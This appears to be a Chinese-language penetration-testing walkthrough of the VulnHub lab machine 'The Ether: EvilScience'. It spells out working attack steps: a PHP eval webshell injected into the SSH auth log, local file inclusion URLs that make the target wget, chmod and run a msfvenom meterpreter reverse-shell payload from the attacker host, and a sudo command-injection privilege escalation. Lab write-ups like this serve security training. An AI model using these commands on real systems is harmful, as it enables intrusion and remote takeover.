The Ether: EvilScience (v1.0.1)打靶渗透【附代码】(权限提升)

发布于:2024-08-08 ⋅ 阅读:(111) ⋅ 点赞:(0)

靶机下载地址:

https://www.vulnhub.com/entry/the-ether-evilscience-v101,212/

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '00:0C:29:7F:50:FB'

1.2. 端口扫描

nmap -p- 192.168.7.172

1.3. 目录扫描

 dirb http://192.168.7.172

1.4. 敏感信息获取

2. WEB打点寻找漏洞点

2.1. 老规矩,逐个点击功能点,查看可以利用的功能点

1.点击about us中url带有file协议,疑似存在文件包含漏洞,尝试利用文件包含的几个方式获权限

2.由敏感信息可知其服务器中间件是apache,文件包含可通过日志文件包含获权,尝试拼接默认目录 -> /var/log/auth.log路径无法访问?存在报错??? -> 尝试利用ssh登录报错注入进错误访问日志中

ssh "<?php eval($_GET[cmd]);?>"@192.168.7.172

3.尝试burp抓包,查看数据包信息

2.2. GetShell

1.拼接命令

2.打开kali,利用msf生成shell -> 同时打开msf的内部监听

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=4444 -f elf > shell.elf

msfconsole

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.7.36
set lport 4444

3.新启一个http临时服务,让靶机远程下载我们的shell.elf文件[起的服务一定要在shell文件同一目录开启]

python -m http.server 8001

4.在靶机网页逐个拼接下方链接

/?file=/var/log/auth.log&d1no=system('wget+192.168.7.36:8001/shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

监听器上线

3. 权限提升

3.1. 老规矩,msf上线先转shell,再利用python做持续化输出调配

shell
# 持续化
python -c 'import pty;pty.spawn("/bin/bash")'

3.2. 老规矩,查看用户执行命令权限

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami


网站公告

今日签到

点亮在社区的每一天
去签到